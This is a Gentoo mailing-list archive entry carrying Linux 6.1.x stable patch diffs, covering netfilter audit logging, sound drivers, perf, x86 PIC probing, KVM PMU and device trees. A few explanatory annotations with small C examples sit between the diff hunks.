++	char *buf = kasprintf(GFP_ATOMIC, "%s:%u", table->name, base_seq);
++
++	audit_log_nfcfg(buf, table->family, nentries,
++			AUDIT_NFT_OP_OBJ_RESET, GFP_ATOMIC);
++	kfree(buf);
++}
++
+ struct nft_obj_filter {
+ 	char		*table;
+ 	u32		type;
+@@ -7338,8 +7348,10 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 	struct net *net = sock_net(skb->sk);
+ 	int family = nfmsg->nfgen_family;
+ 	struct nftables_pernet *nft_net;
++	unsigned int entries = 0;
+ 	struct nft_object *obj;
+ 	bool reset = false;
++	int rc = 0;
+ 
+ 	if (NFNL_MSG_TYPE(cb->nlh->nlmsg_type) == NFT_MSG_GETOBJ_RESET)
+ 		reset = true;
+@@ -7352,6 +7364,7 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 		if (family != NFPROTO_UNSPEC && family != table->family)
+ 			continue;
+ 
++		entries = 0;
+ 		list_for_each_entry_rcu(obj, &table->objects, list) {
+ 			if (!nft_is_active(net, obj))
+ 				goto cont;
+@@ -7367,34 +7380,27 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 			    filter->type != NFT_OBJECT_UNSPEC &&
+ 			    obj->ops->type->type != filter->type)
+ 				goto cont;
+-			if (reset) {
+-				char *buf = kasprintf(GFP_ATOMIC,
+-						      "%s:%u",
+-						      table->name,
+-						      nft_net->base_seq);
+-
+-				audit_log_nfcfg(buf,
+-						family,
+-						obj->handle,
+-						AUDIT_NFT_OP_OBJ_RESET,
+-						GFP_ATOMIC);
+-				kfree(buf);
+-			}
+ 
+-			if (nf_tables_fill_obj_info(skb, net, NETLINK_CB(cb->skb).portid,
+-						    cb->nlh->nlmsg_seq,
+-						    NFT_MSG_NEWOBJ,
+-						    NLM_F_MULTI | NLM_F_APPEND,
+-						    table->family, table,
+-						    obj, reset) < 0)
+-				goto done;
++			rc = nf_tables_fill_obj_info(skb, net,
++						     NETLINK_CB(cb->skb).portid,
++						     cb->nlh->nlmsg_seq,
++						     NFT_MSG_NEWOBJ,
++						     NLM_F_MULTI | NLM_F_APPEND,
++						     table->family, table,
++						     obj, reset);
++			if (rc < 0)
++				break;
+ 
++			entries++;
+ 			nl_dump_check_consistent(cb, nlmsg_hdr(skb));
+ cont:
+ 			idx++;
+ 		}
++		if (reset && entries)
++			audit_log_obj_reset(table, nft_net->base_seq, entries);
++		if (rc < 0)
++			break;
+ 	}
+-done:
+ 	rcu_read_unlock();
+ 
+ 	cb->args[0] = idx;
+@@ -7499,7 +7505,7 @@ static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 		audit_log_nfcfg(buf,
+ 				family,
+-				obj->handle,
++				1,
+ 				AUDIT_NFT_OP_OBJ_RESET,
+ 				GFP_ATOMIC);
+ 		kfree(buf);
+diff --git a/net/netfilter/nfnetlink_log.c b/net/netfilter/nfnetlink_log.c
+index d97eb280cb2e8..c5ff699e30469 100644
+--- a/net/netfilter/nfnetlink_log.c
++++ b/net/netfilter/nfnetlink_log.c
+@@ -690,8 +690,8 @@ nfulnl_log_packet(struct net *net,
+ 	unsigned int plen = 0;
+ 	struct nfnl_log_net *log = nfnl_log_pernet(net);
+ 	const struct nfnl_ct_hook *nfnl_ct = NULL;
++	enum ip_conntrack_info ctinfo = 0;
+ 	struct nf_conn *ct = NULL;
+-	enum ip_conntrack_info ctinfo;
+ 
+ 	if (li_user && li_user->type == NF_LOG_TYPE_ULOG)
+ 		li = li_user;
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index ba93e2a6bdbb4..04448bfb4d3db 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -364,7 +364,7 @@ static int u32_init(struct tcf_proto *tp)
+ 	idr_init(&root_ht->handle_idr);
+ 
+ 	if (tp_c == NULL) {
+-		tp_c = kzalloc(struct_size(tp_c, hlist->ht, 1), GFP_KERNEL);
++		tp_c = kzalloc(sizeof(*tp_c), GFP_KERNEL);
+ 		if (tp_c == NULL) {
+ 			kfree(root_ht);
+ 			return -ENOBUFS;
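
The cls_u32 hunk shrinks the allocation from struct_size(tp_c, hlist->ht, 1) to a plain sizeof(*tp_c): struct_size(p, m, n) is the kernel's overflow-checked "header plus n trailing array elements" size, and here the extra element was being counted for a hash table that lives in its own allocation. A userspace approximation of the two sizes, using a toy struct layout (the real tc_u_common fields are assumed, not reproduced):

    #include <stdio.h>

    struct ht  { int divisor; void *ht[]; };  /* toy: flexible array tail */
    struct ctl { long refcnt; struct ht *hlist; };

    int main(void)
    {
        /* struct_size(tp_c, hlist->ht, 1) in the kernel is roughly
         * sizeof(*tp_c) + 1 * sizeof(tp_c->hlist->ht[0]), with overflow
         * checking; this is the unchecked userspace equivalent. */
        size_t plain    = sizeof(struct ctl);
        size_t with_one = sizeof(struct ctl)
                        + sizeof(((struct ctl *)0)->hlist->ht[0]);

        printf("sizeof(*tp_c)=%zu  struct_size(...,1)~=%zu\n",
               plain, with_one);
        return 0;
    }
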
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index 2873420c9aca8..bc03b5692983c 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -343,6 +343,12 @@ static const struct config_entry config_table[] = {
+ 					DMI_MATCH(DMI_SYS_VENDOR, "Google"),
+ 				}
+ 			},
++			{
++				.ident = "Google firmware",
++				.matches = {
++					DMI_MATCH(DMI_BIOS_VERSION, "Google"),
++				}
++			},
+ 			{}
+ 		}
+ 	},
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index 620ecbfa4a7a8..f86fc7cd104d4 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3251,6 +3251,8 @@ int rt5645_set_jack_detect(struct snd_soc_component *component,
+ 				RT5645_GP1_PIN_IRQ, RT5645_GP1_PIN_IRQ);
+ 		regmap_update_bits(rt5645->regmap, RT5645_GEN_CTRL1,
+ 				RT5645_DIG_GATE_CTRL, RT5645_DIG_GATE_CTRL);
++		regmap_update_bits(rt5645->regmap, RT5645_DEPOP_M1,
++				RT5645_HP_CB_MASK, RT5645_HP_CB_PU);
+ 	}
+ 	rt5645_irq(0, rt5645);
+ 
+diff --git a/sound/soc/codecs/tas2780.c b/sound/soc/codecs/tas2780.c
+index afdf0c863aa10..a2d27410bbefa 100644
+--- a/sound/soc/codecs/tas2780.c
++++ b/sound/soc/codecs/tas2780.c
+@@ -39,7 +39,7 @@ static void tas2780_reset(struct tas2780_priv *tas2780)
+ 		usleep_range(2000, 2050);
+ 	}
+ 
+-	snd_soc_component_write(tas2780->component, TAS2780_SW_RST,
++	ret = snd_soc_component_write(tas2780->component, TAS2780_SW_RST,
+ 				TAS2780_RST);
+ 	if (ret)
+ 		dev_err(tas2780->dev, "%s:errCode:0x%x Reset error!\n",
+diff --git a/sound/soc/codecs/tlv320adc3xxx.c b/sound/soc/codecs/tlv320adc3xxx.c
+index 52bb557247244..6bd6da01aafac 100644
+--- a/sound/soc/codecs/tlv320adc3xxx.c
++++ b/sound/soc/codecs/tlv320adc3xxx.c
+@@ -293,7 +293,7 @@
+ #define ADC3XXX_BYPASS_RPGA		0x80
+ 
+ /* MICBIAS control bits */
+-#define ADC3XXX_MICBIAS_MASK		0x2
++#define ADC3XXX_MICBIAS_MASK		0x3
+ #define ADC3XXX_MICBIAS1_SHIFT		5
+ #define ADC3XXX_MICBIAS2_SHIFT		3
+ 
+@@ -1099,7 +1099,7 @@ static int adc3xxx_parse_dt_micbias(struct adc3xxx *adc3xxx,
+ 	unsigned int val;
+ 
+ 	if (!of_property_read_u32(np, propname, &val)) {
+-		if (val >= ADC3XXX_MICBIAS_AVDD) {
++		if (val > ADC3XXX_MICBIAS_AVDD) {
+ 			dev_err(dev, "Invalid property value for '%s'\n", propname);
+ 			return -EINVAL;
+ 		}
+diff --git a/sound/soc/generic/simple-card.c b/sound/soc/generic/simple-card.c
+index fbb682747f598..a8bc4e45816df 100644
+--- a/sound/soc/generic/simple-card.c
++++ b/sound/soc/generic/simple-card.c
+@@ -678,10 +678,12 @@ static int asoc_simple_probe(struct platform_device *pdev)
+ 		struct snd_soc_dai_link *dai_link = priv->dai_link;
+ 		struct simple_dai_props *dai_props = priv->dai_props;
+ 
++		ret = -EINVAL;
++
+ 		cinfo = dev->platform_data;
+ 		if (!cinfo) {
+ 			dev_err(dev, "no info for asoc-simple-card\n");
+-			return -EINVAL;
++			goto err;
+ 		}
+ 
+ 		if (!cinfo->name ||
+@@ -690,7 +692,7 @@ static int asoc_simple_probe(struct platform_device *pdev)
+ 		    !cinfo->platform ||
+ 		    !cinfo->cpu_dai.name) {
+ 			dev_err(dev, "insufficient asoc_simple_card_info settings\n");
+-			return -EINVAL;
++			goto err;
+ 		}
+ 
+ 		cpus			= dai_link->cpus;
+diff --git a/sound/soc/sof/sof-pci-dev.c b/sound/soc/sof/sof-pci-dev.c
+index 643fd1036d60b..05fb4e20e8a40 100644
+--- a/sound/soc/sof/sof-pci-dev.c
++++ b/sound/soc/sof/sof-pci-dev.c
+@@ -141,6 +141,13 @@ static const struct dmi_system_id community_key_platforms[] = {
+ 			DMI_MATCH(DMI_PRODUCT_FAMILY, "Google"),
+ 		}
+ 	},
++	{
++		.ident = "Google firmware",
++		.callback = chromebook_use_community_key,
++		.matches = {
++			DMI_MATCH(DMI_BIOS_VERSION, "Google"),
++		}
++	},
+ 	{},
+ };
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 6129a62316422..f458328f9ec42 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2218,6 +2218,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2ab6, /* T+A devices */
+ 		   QUIRK_FLAG_DSD_RAW),
++	VENDOR_FLG(0x2afd, /* McIntosh Laboratory, Inc. */
++		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x2d87, /* Cayin device */
+ 		   QUIRK_FLAG_DSD_RAW),
+ 	VENDOR_FLG(0x3336, /* HEM devices */
+diff --git a/tools/perf/util/evlist.c b/tools/perf/util/evlist.c
+index 6612b00949e70..ca08e6dc8b232 100644
+--- a/tools/perf/util/evlist.c
++++ b/tools/perf/util/evlist.c
+@@ -252,6 +252,9 @@ static struct evsel *evlist__dummy_event(struct evlist *evlist)
+ 		.type	= PERF_TYPE_SOFTWARE,
+ 		.config = PERF_COUNT_SW_DUMMY,
+ 		.size	= sizeof(attr), /* to capture ABI version */
++		/* Avoid frequency mode for dummy events to avoid associated timers. */
++		.freq = 0,
++		.sample_period = 1,
+ 	};
+ 
+ 	return evsel__new_idx(&attr, evlist->core.nr_entries);
+@@ -278,8 +281,6 @@ struct evsel *evlist__add_aux_dummy(struct evlist *evlist, bool system_wide)
+ 	evsel->core.attr.exclude_kernel = 1;
+ 	evsel->core.attr.exclude_guest = 1;
+ 	evsel->core.attr.exclude_hv = 1;
+-	evsel->core.attr.freq = 0;
+-	evsel->core.attr.sample_period = 1;
+ 	evsel->core.system_wide = system_wide;
+ 	evsel->no_aux_samples = true;
+ 	evsel->name = strdup("dummy:u");
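
Folding freq = 0 and sample_period = 1 into evlist__dummy_event() means every dummy event, not only the aux-tracking one, stays in period mode; frequency-mode events make the kernel arm a per-CPU timer to re-tune the period, which a dummy event never needs. The fields below are the real linux/perf_event.h ones, and the program just shows the resulting attr shape:

    #include <stdio.h>
    #include <string.h>
    #include <linux/perf_event.h>

    int main(void)
    {
        struct perf_event_attr attr;

        memset(&attr, 0, sizeof(attr));
        attr.type   = PERF_TYPE_SOFTWARE;
        attr.config = PERF_COUNT_SW_DUMMY;
        attr.size   = sizeof(attr);
        attr.freq          = 0;   /* period mode: no freq-adjust timer */
        attr.sample_period = 1;

        printf("freq=%u sample_period=%llu\n", (unsigned)attr.freq,
               (unsigned long long)attr.sample_period);
        return 0;
    }
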
+diff --git a/tools/testing/selftests/netfilter/nft_audit.sh b/tools/testing/selftests/netfilter/nft_audit.sh
+index 5267c88496d51..99ed5bd6e8402 100755
+--- a/tools/testing/selftests/netfilter/nft_audit.sh
++++ b/tools/testing/selftests/netfilter/nft_audit.sh
+@@ -99,6 +99,12 @@ do_test 'nft add counter t1 c1' \
+ do_test 'nft add counter t2 c1; add counter t2 c2' \
+ 'table=t2 family=2 entries=2 op=nft_register_obj'
+ 
++for ((i = 3; i <= 500; i++)); do
++	echo "add counter t2 c$i"
++done >$rulefile
++do_test "nft -f $rulefile" \
++'table=t2 family=2 entries=498 op=nft_register_obj'
++
+ # adding/updating quotas
+ 
+ do_test 'nft add quota t1 q1 { 10 bytes }' \
+@@ -107,6 +113,12 @@ do_test 'nft add quota t1 q1 { 10 bytes }' \
+ do_test 'nft add quota t2 q1 { 10 bytes }; add quota t2 q2 { 10 bytes }' \
+ 'table=t2 family=2 entries=2 op=nft_register_obj'
+ 
++for ((i = 3; i <= 500; i++)); do
++	echo "add quota t2 q$i { 10 bytes }"
++done >$rulefile
++do_test "nft -f $rulefile" \
++'table=t2 family=2 entries=498 op=nft_register_obj'
++
+ # changing the quota value triggers obj update path
+ do_test 'nft add quota t1 q1 { 20 bytes }' \
+ 'table=t1 family=2 entries=1 op=nft_register_obj'
+@@ -156,6 +168,40 @@ done
+ do_test 'nft reset set t1 s' \
+ 'table=t1 family=2 entries=3 op=nft_reset_setelem'
+ 
++# resetting counters
++
++do_test 'nft reset counter t1 c1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset counters t1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset counters t2' \
++'table=t2 family=2 entries=342 op=nft_reset_obj
++table=t2 family=2 entries=158 op=nft_reset_obj'
++
++do_test 'nft reset counters' \
++'table=t1 family=2 entries=1 op=nft_reset_obj
++table=t2 family=2 entries=341 op=nft_reset_obj
++table=t2 family=2 entries=159 op=nft_reset_obj'
++
++# resetting quotas
++
++do_test 'nft reset quota t1 q1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset quotas t1' \
++'table=t1 family=2 entries=1 op=nft_reset_obj'
++
++do_test 'nft reset quotas t2' \
++'table=t2 family=2 entries=315 op=nft_reset_obj
++table=t2 family=2 entries=185 op=nft_reset_obj'
++
++do_test 'nft reset quotas' \
++'table=t1 family=2 entries=1 op=nft_reset_obj
++table=t2 family=2 entries=314 op=nft_reset_obj
++table=t2 family=2 entries=186 op=nft_reset_obj'
++
+ # deleting rules
+ 
+ readarray -t handles < <(nft -a list chain t1 c1 | \


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-02 11:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-02 11:10 UTC (permalink / raw
  To: gentoo-commits

commit:     e87165447456e2d4f4675c67b3a59b9d5396dc5e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Nov  2 11:09:47 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Nov  2 11:09:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e8716544

Linux patch 6.1.61

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1060_linux-6.1.61.patch | 2922 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2926 insertions(+)

diff --git a/0000_README b/0000_README
index a3b5d2f0..78a774ef 100644
--- a/0000_README
+++ b/0000_README
@@ -283,6 +283,10 @@ Patch:  1059_linux-6.1.60.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.60
 
+Patch:  1060_linux-6.1.61.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.61
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1060_linux-6.1.61.patch b/1060_linux-6.1.61.patch
new file mode 100644
index 00000000..a25aac45
--- /dev/null
+++ b/1060_linux-6.1.61.patch
@@ -0,0 +1,2922 @@
+diff --git a/Makefile b/Makefile
+index d47edcd8888e8..635474f38aaa9 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 60
++SUBLEVEL = 61
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/omap4-l4-abe.dtsi b/arch/arm/boot/dts/omap4-l4-abe.dtsi
+index 7ae8b620515c5..59f546a278f87 100644
+--- a/arch/arm/boot/dts/omap4-l4-abe.dtsi
++++ b/arch/arm/boot/dts/omap4-l4-abe.dtsi
+@@ -109,6 +109,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49022000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP4_MCBSP1_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 17 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -142,6 +144,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49024000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP4_MCBSP2_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 22 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -175,6 +179,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49026000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP4_MCBSP3_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+diff --git a/arch/arm/boot/dts/omap4-l4.dtsi b/arch/arm/boot/dts/omap4-l4.dtsi
+index 46b8f9efd4131..3fcef3080eaec 100644
+--- a/arch/arm/boot/dts/omap4-l4.dtsi
++++ b/arch/arm/boot/dts/omap4-l4.dtsi
+@@ -2043,6 +2043,8 @@
+ 				compatible = "ti,omap4-mcbsp";
+ 				reg = <0x0 0xff>; /* L4 Interconnect */
+ 				reg-names = "mpu";
++				clocks = <&l4_per_clkctrl OMAP4_MCBSP4_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 16 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+diff --git a/arch/arm/boot/dts/omap5-l4-abe.dtsi b/arch/arm/boot/dts/omap5-l4-abe.dtsi
+index a03bca5a35844..97b0c3b5f573f 100644
+--- a/arch/arm/boot/dts/omap5-l4-abe.dtsi
++++ b/arch/arm/boot/dts/omap5-l4-abe.dtsi
+@@ -109,6 +109,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49022000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP5_MCBSP1_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 17 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -142,6 +144,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49024000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP5_MCBSP2_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 22 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+@@ -175,6 +179,8 @@
+ 				reg = <0x0 0xff>, /* MPU private access */
+ 				      <0x49026000 0xff>; /* L3 Interconnect */
+ 				reg-names = "mpu", "dma";
++				clocks = <&abe_clkctrl OMAP5_MCBSP3_CLKCTRL 24>;
++				clock-names = "fck";
+ 				interrupts = <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH>;
+ 				interrupt-names = "common";
+ 				ti,buffer-size = <128>;
+diff --git a/arch/arm/mach-omap1/timer32k.c b/arch/arm/mach-omap1/timer32k.c
+index 410d17d1d4431..f618a6df29382 100644
+--- a/arch/arm/mach-omap1/timer32k.c
++++ b/arch/arm/mach-omap1/timer32k.c
+@@ -176,17 +176,18 @@ static u64 notrace omap_32k_read_sched_clock(void)
+ 	return sync32k_cnt_reg ? readl_relaxed(sync32k_cnt_reg) : 0;
+ }
+ 
++static struct timespec64 persistent_ts;
++static cycles_t cycles;
++static unsigned int persistent_mult, persistent_shift;
++
+ /**
+  * omap_read_persistent_clock64 -  Return time from a persistent clock.
++ * @ts: &struct timespec64 for the returned time
+  *
+  * Reads the time from a source which isn't disabled during PM, the
+  * 32k sync timer.  Convert the cycles elapsed since last read into
+  * nsecs and adds to a monotonically increasing timespec64.
+  */
+-static struct timespec64 persistent_ts;
+-static cycles_t cycles;
+-static unsigned int persistent_mult, persistent_shift;
+-
+ static void omap_read_persistent_clock64(struct timespec64 *ts)
+ {
+ 	unsigned long long nsecs;
+@@ -206,10 +207,9 @@ static void omap_read_persistent_clock64(struct timespec64 *ts)
+ /**
+  * omap_init_clocksource_32k - setup and register counter 32k as a
+  * kernel clocksource
+- * @pbase: base addr of counter_32k module
+- * @size: size of counter_32k to map
++ * @vbase: base addr of counter_32k module
+  *
+- * Returns 0 upon success or negative error code upon failure.
++ * Returns: %0 upon success or negative error code upon failure.
+  *
+  */
+ static int __init omap_init_clocksource_32k(void __iomem *vbase)
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+index 9bdc0b93001f4..b2b3c72a0f87d 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-rock-pi-4.dtsi
+@@ -493,6 +493,7 @@
+ 
+ &i2s0 {
+ 	pinctrl-0 = <&i2s0_2ch_bus>;
++	pinctrl-1 = <&i2s0_2ch_bus_bclk_off>;
+ 	rockchip,capture-channels = <2>;
+ 	rockchip,playback-channels = <2>;
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index 59858f2dc8b9f..5f3caf01badeb 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -2396,6 +2396,16 @@
+ 					<4 RK_PA0 1 &pcfg_pull_none>;
+ 			};
+ 
++			i2s0_2ch_bus_bclk_off: i2s0-2ch-bus-bclk-off {
++				rockchip,pins =
++					<3 RK_PD0 RK_FUNC_GPIO &pcfg_pull_none>,
++					<3 RK_PD1 1 &pcfg_pull_none>,
++					<3 RK_PD2 1 &pcfg_pull_none>,
++					<3 RK_PD3 1 &pcfg_pull_none>,
++					<3 RK_PD7 1 &pcfg_pull_none>,
++					<4 RK_PA0 1 &pcfg_pull_none>;
++			};
++
+ 			i2s0_8ch_bus: i2s0-8ch-bus {
+ 				rockchip,pins =
+ 					<3 RK_PD0 1 &pcfg_pull_none>,
+diff --git a/arch/sparc/lib/checksum_32.S b/arch/sparc/lib/checksum_32.S
+index 781e39b3c009f..481e94e1f6857 100644
+--- a/arch/sparc/lib/checksum_32.S
++++ b/arch/sparc/lib/checksum_32.S
+@@ -453,5 +453,5 @@ ccslow:	cmp	%g1, 0
+  * we only bother with faults on loads... */
+ 
+ cc_fault:
+-	ret
++	retl
+ 	 clr	%o0
+diff --git a/arch/x86/include/asm/i8259.h b/arch/x86/include/asm/i8259.h
+index 637fa1df35124..c715097e92fd2 100644
+--- a/arch/x86/include/asm/i8259.h
++++ b/arch/x86/include/asm/i8259.h
+@@ -69,6 +69,8 @@ struct legacy_pic {
+ 	void (*make_irq)(unsigned int irq);
+ };
+ 
++void legacy_pic_pcat_compat(void);
++
+ extern struct legacy_pic *legacy_pic;
+ extern struct legacy_pic null_legacy_pic;
+ 
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index b3af2d45bbbb5..5190cc3db771e 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -27,6 +27,7 @@
+  *		_X	- regular server parts
+  *		_D	- micro server parts
+  *		_N,_P	- other mobile parts
++ *		_H	- premium mobile parts
+  *		_S	- other client parts
+  *
+  *		Historical OPTDIFFs:
+@@ -125,6 +126,7 @@
+ 
+ #define INTEL_FAM6_LUNARLAKE_M		0xBD
+ 
++#define INTEL_FAM6_ARROWLAKE_H		0xC5
+ #define INTEL_FAM6_ARROWLAKE		0xC6
+ 
+ /* "Small Core" Processors (Atom/E-Core) */
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 0f762070a5e10..2252340b2133e 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -147,6 +147,9 @@ static int __init acpi_parse_madt(struct acpi_table_header *table)
+ 		pr_debug("Local APIC address 0x%08x\n", madt->address);
+ 	}
+ 
++	if (madt->flags & ACPI_MADT_PCAT_COMPAT)
++		legacy_pic_pcat_compat();
++
+ 	/* ACPI 6.3 and newer support the online capable bit. */
+ 	if (acpi_gbl_FADT.header.revision > 6 ||
+ 	    (acpi_gbl_FADT.header.revision == 6 &&
+diff --git a/arch/x86/kernel/i8259.c b/arch/x86/kernel/i8259.c
+index f91e5e31aa4f0..2ac5f488300cf 100644
+--- a/arch/x86/kernel/i8259.c
++++ b/arch/x86/kernel/i8259.c
+@@ -32,6 +32,7 @@
+  */
+ static void init_8259A(int auto_eoi);
+ 
++static bool pcat_compat __ro_after_init;
+ static int i8259A_auto_eoi;
+ DEFINE_RAW_SPINLOCK(i8259A_lock);
+ 
+@@ -301,15 +302,32 @@ static void unmask_8259A(void)
+ 
+ static int probe_8259A(void)
+ {
++	unsigned char new_val, probe_val = ~(1 << PIC_CASCADE_IR);
+ 	unsigned long flags;
+-	unsigned char probe_val = ~(1 << PIC_CASCADE_IR);
+-	unsigned char new_val;
++
++	/*
++	 * If MADT has the PCAT_COMPAT flag set, then do not bother probing
++	 * for the PIC. Some BIOSes leave the PIC uninitialized and probing
++	 * fails.
++	 *
++	 * Right now this causes problems as quite some code depends on
++	 * nr_legacy_irqs() > 0 or has_legacy_pic() == true. This is silly
++	 * when the system has an IO/APIC because then PIC is not required
++	 * at all, except for really old machines where the timer interrupt
++	 * must be routed through the PIC. So just pretend that the PIC is
++	 * there and let legacy_pic->init() initialize it for nothing.
++	 *
++	 * Alternatively this could just try to initialize the PIC and
++	 * repeat the probe, but for cases where there is no PIC that's
++	 * just pointless.
++	 */
++	if (pcat_compat)
++		return nr_legacy_irqs();
++
+ 	/*
+-	 * Check to see if we have a PIC.
+-	 * Mask all except the cascade and read
+-	 * back the value we just wrote. If we don't
+-	 * have a PIC, we will read 0xff as opposed to the
+-	 * value we wrote.
++	 * Check to see if we have a PIC.  Mask all except the cascade and
++	 * read back the value we just wrote. If we don't have a PIC, we
++	 * will read 0xff as opposed to the value we wrote.
+ 	 */
+ 	raw_spin_lock_irqsave(&i8259A_lock, flags);
+ 
+@@ -431,5 +449,9 @@ static int __init i8259A_init_ops(void)
+ 
+ 	return 0;
+ }
+-
+ device_initcall(i8259A_init_ops);
++
++void __init legacy_pic_pcat_compat(void)
++{
++	pcat_compat = true;
++}
+diff --git a/arch/x86/kvm/pmu.h b/arch/x86/kvm/pmu.h
+index c976490b75568..3666578b88a00 100644
+--- a/arch/x86/kvm/pmu.h
++++ b/arch/x86/kvm/pmu.h
+@@ -63,6 +63,12 @@ static inline u64 pmc_read_counter(struct kvm_pmc *pmc)
+ 	return counter & pmc_bitmask(pmc);
+ }
+ 
++static inline void pmc_write_counter(struct kvm_pmc *pmc, u64 val)
++{
++	pmc->counter += val - pmc_read_counter(pmc);
++	pmc->counter &= pmc_bitmask(pmc);
++}
++
+ static inline void pmc_release_perf_event(struct kvm_pmc *pmc)
+ {
+ 	if (pmc->perf_event) {
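
pmc_write_counter() consolidates the duplicated "counter += val - read" update that the svm and vmx hunks below switch to, and adds the pmc_bitmask() truncation the open-coded copies lacked. A numeric sketch, assuming a 48-bit counter mask and ignoring the live perf-event delta that the real pmc_read_counter() folds in:

    #include <stdio.h>
    #include <stdint.h>

    int main(void)
    {
        uint64_t mask    = (1ULL << 48) - 1;
        uint64_t counter = 0xABCD;          /* current emulated count */
        uint64_t val     = 0x123456789ULL;  /* guest write to the MSR */

        counter += val - (counter & mask);  /* pmc->counter += val - read */
        counter &= mask;                    /* new: truncate to the allowed width */

        printf("counter=0x%llx\n", (unsigned long long)counter);
        return 0;
    }
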
+diff --git a/arch/x86/kvm/svm/pmu.c b/arch/x86/kvm/svm/pmu.c
+index 9d65cd095691b..1cb2bf9808f57 100644
+--- a/arch/x86/kvm/svm/pmu.c
++++ b/arch/x86/kvm/svm/pmu.c
